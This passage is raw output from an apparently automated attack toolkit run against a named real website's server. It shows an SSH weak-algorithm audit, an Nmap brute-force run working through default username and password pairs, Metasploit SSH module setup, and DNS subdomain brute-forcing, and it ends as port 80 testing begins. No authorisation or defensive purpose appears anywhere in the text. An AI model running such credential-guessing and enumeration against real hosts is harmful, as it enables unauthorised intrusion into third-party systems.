                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
                                            `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group-exchange-sha1    -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.3.0
(kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
(kex) diffie-hellman-group1-sha1            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
                                            `- [warn] using small 1024-bit modulus
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28

# host-key algorithms
(key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ssh-dss                               -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
                                            `- [warn] using small 1024-bit modulus
                                            `- [warn] using weak random number generator could reveal the key
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
                                            `- [warn] using weak random number generator could reveal the key
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519                           -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
(enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) arcfour256                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher
                                            `- [info] available since OpenSSH 4.2
(enc) arcfour128                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher
                                            `- [info] available since OpenSSH 4.2
(enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2
(enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
                                            `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
(enc) 3des-cbc                              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) blowfish-cbc                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled since Dropbear SSH 0.53
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) cast128-cbc                           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 2.1.0
(enc) aes192-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0
(enc) aes256-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
(enc) arcfour                               -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher
                                            `- [info] available since OpenSSH 2.1.0
(enc) rijndael-cbc@lysator.liu.se           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0

# message authentication code algorithms
(mac) hmac-md5-etm@openssh.com              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-ripemd160-etm@openssh.com        -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-sha1-96-etm@openssh.com          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-md5-96-etm@openssh.com           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-md5                              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-ripemd160                        -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 2.5.0
(mac) hmac-ripemd160@openssh.com            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 2.1.0
(mac) hmac-sha1-96                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
(mac) hmac-md5-96                           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.5.0

# algorithm recommendations (for OpenSSH 6.6.1)
(rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha1   -- kex algorithm to remove
(rec) -diffie-hellman-group1-sha1           -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
(rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
(rec) -ssh-dss                              -- key algorithm to remove
(rec) -arcfour                              -- enc algorithm to remove
(rec) -rijndael-cbc@lysator.liu.se          -- enc algorithm to remove
(rec) -blowfish-cbc                         -- enc algorithm to remove
(rec) -3des-cbc                             -- enc algorithm to remove
(rec) -aes256-cbc                           -- enc algorithm to remove
(rec) -arcfour256                           -- enc algorithm to remove
(rec) -cast128-cbc                          -- enc algorithm to remove
(rec) -aes192-cbc                           -- enc algorithm to remove
(rec) -arcfour128                           -- enc algorithm to remove
(rec) -aes128-cbc                           -- enc algorithm to remove
(rec) -hmac-sha2-512                        -- mac algorithm to remove
(rec) -hmac-md5-96                          -- mac algorithm to remove
(rec) -hmac-md5-etm@openssh.com             -- mac algorithm to remove
(rec) -hmac-sha1-96-etm@openssh.com         -- mac algorithm to remove
(rec) -hmac-ripemd160-etm@openssh.com       -- mac algorithm to remove
(rec) -hmac-md5-96-etm@openssh.com          -- mac algorithm to remove
(rec) -hmac-sha2-256                        -- mac algorithm to remove
(rec) -hmac-ripemd160                       -- mac algorithm to remove
(rec) -umac-128@openssh.com                 -- mac algorithm to remove
(rec) -hmac-sha1-96                         -- mac algorithm to remove
(rec) -umac-64@openssh.com                  -- mac algorithm to remove
(rec) -hmac-md5                             -- mac algorithm to remove
(rec) -hmac-ripemd160@openssh.com           -- mac algorithm to remove
(rec) -hmac-sha1                            -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com              -- mac algorithm to remove

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:20 EDT
NSE: [ssh-run] Failed to specify credentials and command to run.
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:
NSE: [ssh-brute] Trying username/password pair: sysadmin:
NSE: [ssh-brute] Trying username/password pair: netadmin:
NSE: [ssh-brute] Trying username/password pair: guest:
NSE: [ssh-brute] Trying username/password pair: user:
NSE: [ssh-brute] Trying username/password pair: web:
NSE: [ssh-brute] Trying username/password pair: test:
NSE: [ssh-brute] Trying username/password pair: root:123456
NSE: [ssh-brute] Trying username/password pair: admin:123456
NSE: [ssh-brute] Trying username/password pair: administrator:123456
NSE: [ssh-brute] Trying username/password pair: webadmin:123456
NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
NSE: [ssh-brute] Trying username/password pair: netadmin:123456
NSE: [ssh-brute] Trying username/password pair: guest:123456
NSE: [ssh-brute] Trying username/password pair: user:123456
NSE: [ssh-brute] Trying username/password pair: web:123456
NSE: [ssh-brute] Trying username/password pair: test:123456
NSE: [ssh-brute] Trying username/password pair: root:12345
NSE: [ssh-brute] Trying username/password pair: admin:12345
NSE: [ssh-brute] Trying username/password pair: administrator:12345
NSE: [ssh-brute] Trying username/password pair: webadmin:12345
NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
NSE: [ssh-brute] Trying username/password pair: netadmin:12345
NSE: [ssh-brute] Trying username/password pair: guest:12345
NSE: [ssh-brute] Trying username/password pair: user:12345
NSE: [ssh-brute] Trying username/password pair: web:12345
NSE: [ssh-brute] Trying username/password pair: test:12345
NSE: [ssh-brute] Trying username/password pair: root:123456789
NSE: [ssh-brute] Trying username/password pair: admin:123456789
NSE: [ssh-brute] Trying username/password pair: administrator:123456789
NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
NSE: [ssh-brute] Trying username/password pair: guest:123456789
NSE: [ssh-brute] Trying username/password pair: user:123456789
NSE: [ssh-brute] Trying username/password pair: web:123456789
NSE: [ssh-brute] Trying username/password pair: test:123456789
NSE: [ssh-brute] Trying username/password pair: root:password
NSE: [ssh-brute] Trying username/password pair: admin:password
NSE: [ssh-brute] Trying username/password pair: administrator:password
NSE: [ssh-brute] Trying username/password pair: webadmin:password
NSE: [ssh-brute] Trying username/password pair: sysadmin:password
NSE: [ssh-brute] Trying username/password pair: netadmin:password
NSE: [ssh-brute] Trying username/password pair: guest:password
NSE: [ssh-brute] Trying username/password pair: user:password
NSE: [ssh-brute] Trying username/password pair: web:password
NSE: [ssh-brute] Trying username/password pair: test:password
NSE: [ssh-brute] Trying username/password pair: root:iloveyou
NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
NSE: [ssh-brute] Trying username/password pair: user:iloveyou
NSE: [ssh-brute] Trying username/password pair: web:iloveyou
NSE: [ssh-brute] Trying username/password pair: test:iloveyou
NSE: [ssh-brute] Trying username/password pair: root:princess
NSE: [ssh-brute] Trying username/password pair: admin:princess
NSE: [ssh-brute] Trying username/password pair: administrator:princess
NSE: [ssh-brute] Trying username/password pair: webadmin:princess
NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
NSE: [ssh-brute] Trying username/password pair: netadmin:princess
NSE: [ssh-brute] Trying username/password pair: guest:princess
NSE: [ssh-brute] Trying username/password pair: user:princess
NSE: [ssh-brute] Trying username/password pair: web:princess
NSE: [ssh-brute] Trying username/password pair: test:princess
NSE: [ssh-brute] Trying username/password pair: root:12345678
NSE: [ssh-brute] Trying username/password pair: admin:12345678
NSE: [ssh-brute] Trying username/password pair: administrator:12345678
NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
NSE: [ssh-brute] Trying username/password pair: guest:12345678
NSE: [ssh-brute] Trying username/password pair: user:12345678
NSE: [ssh-brute] Trying username/password pair: web:12345678
NSE: [ssh-brute] Trying username/password pair: test:12345678
NSE: [ssh-brute] Trying username/password pair: root:1234567
NSE: [ssh-brute] Trying username/password pair: admin:1234567
NSE: [ssh-brute] Trying username/password pair: administrator:1234567
NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
NSE: [ssh-brute] Trying username/password pair: guest:1234567
NSE: [ssh-brute] Trying username/password pair: user:1234567
NSE: [ssh-brute] Trying username/password pair: web:1234567
NSE: [ssh-brute] Trying username/password pair: test:1234567
NSE: [ssh-brute] Trying username/password pair: root:abc123
NSE: [ssh-brute] Trying username/password pair: admin:abc123
NSE: [ssh-brute] Trying username/password pair: administrator:abc123
NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
NSE: [ssh-brute] Trying username/password pair: guest:abc123
NSE: [ssh-brute] Trying username/password pair: user:abc123
NSE: [ssh-brute] Trying username/password pair: web:abc123
NSE: [ssh-brute] Trying username/password pair: test:abc123
NSE: [ssh-brute] Trying username/password pair: root:nicole
NSE: [ssh-brute] Trying username/password pair: admin:nicole
NSE: [ssh-brute] Trying username/password pair: administrator:nicole
NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
NSE: [ssh-brute] Trying username/password pair: guest:nicole
NSE: [ssh-brute] Trying username/password pair: user:nicole
NSE: [ssh-brute] Trying username/password pair: web:nicole
NSE: [ssh-brute] Trying username/password pair: test:nicole
NSE: [ssh-brute] Trying username/password pair: root:daniel
NSE: [ssh-brute] Trying username/password pair: admin:daniel
NSE: [ssh-brute] Trying username/password pair: administrator:daniel
NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
NSE: [ssh-brute] Trying username/password pair: guest:daniel
NSE: [ssh-brute] Trying username/password pair: user:daniel
NSE: [ssh-brute] Trying username/password pair: web:daniel
NSE: [ssh-brute] Trying username/password pair: test:daniel
NSE: [ssh-brute] Trying username/password pair: root:monkey
NSE: [ssh-brute] Trying username/password pair: admin:monkey
NSE: [ssh-brute] Trying username/password pair: administrator:monkey
NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
NSE: [ssh-brute] Trying username/password pair: guest:monkey
NSE: [ssh-brute] Trying username/password pair: user:monkey
NSE: [ssh-brute] Trying username/password pair: web:monkey
NSE: [ssh-brute] Trying username/password pair: test:monkey
NSE: [ssh-brute] Trying username/password pair: root:babygirl
NSE: [ssh-brute] Trying username/password pair: admin:babygirl
NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
NSE: [ssh-brute] Trying username/password pair: guest:babygirl
NSE: [ssh-brute] Trying username/password pair: user:babygirl
NSE: [ssh-brute] Trying username/password pair: web:babygirl
NSE: [ssh-brute] Trying username/password pair: test:babygirl
NSE: [ssh-brute] Trying username/password pair: root:qwerty
NSE: [ssh-brute] Trying username/password pair: admin:qwerty
NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
NSE: [ssh-brute] Trying username/password pair: guest:qwerty
NSE: [ssh-brute] Trying username/password pair: user:qwerty
NSE: [ssh-brute] Trying username/password pair: web:qwerty
NSE: [ssh-brute] Trying username/password pair: test:qwerty
NSE: [ssh-brute] Trying username/password pair: root:lovely
NSE: [ssh-brute] Trying username/password pair: admin:lovely
NSE: [ssh-brute] Trying username/password pair: administrator:lovely
NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
NSE: [ssh-brute] Trying username/password pair: guest:lovely
NSE: [ssh-brute] Trying username/password pair: user:lovely
NSE: [ssh-brute] Trying username/password pair: web:lovely
NSE: [ssh-brute] Trying username/password pair: test:lovely
NSE: [ssh-brute] Trying username/password pair: root:654321
NSE: [ssh-brute] Trying username/password pair: admin:654321
NSE: [ssh-brute] Trying username/password pair: administrator:654321
NSE: [ssh-brute] Trying username/password pair: webadmin:654321
NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
NSE: [ssh-brute] Trying username/password pair: netadmin:654321
NSE: [ssh-brute] Trying username/password pair: guest:654321
NSE: [ssh-brute] Trying username/password pair: user:654321
NSE: [ssh-brute] Trying username/password pair: web:654321
NSE: [ssh-brute] Trying username/password pair: test:654321
NSE: [ssh-brute] Trying username/password pair: root:michael
NSE: [ssh-brute] Trying username/password pair: admin:michael
NSE: [ssh-brute] Trying username/password pair: administrator:michael
NSE: [ssh-brute] Trying username/password pair: webadmin:michael
NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
NSE: [ssh-brute] Trying username/password pair: netadmin:michael
NSE: [ssh-brute] Trying username/password pair: guest:michael
NSE: [ssh-brute] Trying username/password pair: user:michael
NSE: [ssh-brute] Trying username/password pair: web:michael
NSE: [ssh-brute] Trying username/password pair: test:michael
NSE: [ssh-brute] Trying username/password pair: root:jessica
NSE: [ssh-brute] Trying username/password pair: admin:jessica
NSE: [ssh-brute] Trying username/password pair: administrator:jessica
NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
NSE: [ssh-brute] Trying username/password pair: guest:jessica
NSE: [ssh-brute] Trying username/password pair: user:jessica
NSE: [ssh-brute] Trying username/password pair: web:jessica
NSE: [ssh-brute] Trying username/password pair: test:jessica
NSE: [ssh-brute] Trying username/password pair: root:111111
NSE: [ssh-brute] Trying username/password pair: admin:111111
NSE: [ssh-brute] Trying username/password pair: administrator:111111
NSE: [ssh-brute] Trying username/password pair: webadmin:111111
NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
NSE: [ssh-brute] Trying username/password pair: netadmin:111111
NSE: [ssh-brute] Trying username/password pair: guest:111111
NSE: [ssh-brute] Trying username/password pair: user:111111
NSE: [ssh-brute] Trying username/password pair: web:111111
NSE: [ssh-brute] Trying username/password pair: test:111111
NSE: [ssh-brute] Trying username/password pair: root:ashley
NSE: [ssh-brute] Trying username/password pair: admin:ashley
NSE: [ssh-brute] Trying username/password pair: administrator:ashley
NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
NSE: [ssh-brute] Trying username/password pair: guest:ashley
NSE: [ssh-brute] Trying username/password pair: user:ashley
NSE: [ssh-brute] Trying username/password pair: web:ashley
NSE: [ssh-brute] Trying username/password pair: test:ashley
NSE: [ssh-brute] Trying username/password pair: root:000000
NSE: [ssh-brute] Trying username/password pair: admin:000000
NSE: [ssh-brute] Trying username/password pair: administrator:000000
NSE: [ssh-brute] Trying username/password pair: webadmin:000000
NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
NSE: [ssh-brute] Trying username/password pair: netadmin:000000
NSE: [ssh-brute] Trying username/password pair: guest:000000
NSE: [ssh-brute] Trying username/password pair: user:000000
NSE: [ssh-brute] Trying username/password pair: web:000000
NSE: [ssh-brute] Trying username/password pair: test:000000
NSE: [ssh-brute] Trying username/password pair: root:iloveu
NSE: [ssh-brute] Trying username/password pair: admin:iloveu
NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.43s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
| ssh-brute:
|   Accounts: No valid accounts found
|_  Statistics: Performed 233 guesses in 181 seconds, average tps: 1.5
| ssh-hostkey:
|   1024 28:53:f6:e0:cd:8d:b0:ba:bf:c5:3f:ed:97:ff:c7:52 (DSA)
|   2048 4f:c7:a5:bc:88:8a:ab:28:35:a1:c2:07:24:51:48:e5 (RSA)
|_  256 48:0a:9c:f0:85:b3:8b:ae:37:21:26:d5:d4:f6:5c:c6 (ECDSA)
| ssh-publickey-acceptance:
|_  Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   474.72 ms 229.ip-51-255-33.eu (51.255.33.229)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.28 seconds

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.16.57-dev                         ]
+ -- --=[ 1767 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

USER_FILE => /BruteX/wordlists/simple-users.txt
RHOSTS => elderechohumano.org
[!] RHOST is not a valid option for this module. Did you mean RHOSTS?
RHOST => elderechohumano.org
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
[+] 51.255.33.229:22      - SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10 ( service.version=6.6.1p1 openssh.comment=Ubuntu-2ubuntu2.10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=14.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] elderechohumano.org:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:24 EDT
Nmap scan report for elderechohumano.org (51.255.33.229)
Host is up (0.42s latency).
rDNS record for 51.255.33.229: 229.ip-51-255-33.eu

PORT   STATE SERVICE VERSION
53/tcp open  domain  (unknown banner: none)
|_dns-fuzz: Server didn't response to our probe, can't fuzz
| dns-nsec-enum:
|_  No NSEC records found
| dns-nsec3-enum:
|_  DNSSEC NSEC3 not supported
| dns-nsid:
|_  bind.version: none
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    none
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/23%Time=5B050922%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Host script results:
| dns-blacklist:
|   SPAM
|_    l2.apews.org - SPAM
| dns-brute:
|   DNS Brute-force hostnames:
|     ns.elderechohumano.org - 51.255.33.229
|     mail.elderechohumano.org - 51.255.33.229
|     www.elderechohumano.org - 51.255.33.229
|     ftp.elderechohumano.org - 51.255.33.229
|_    smtp.elderechohumano.org - 51.255.33.229

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   472.37 ms 229.ip-51-255-33.eu (51.255.33.229)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.27 seconds
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 80 opened... running tests...
#######################################################################################################################################
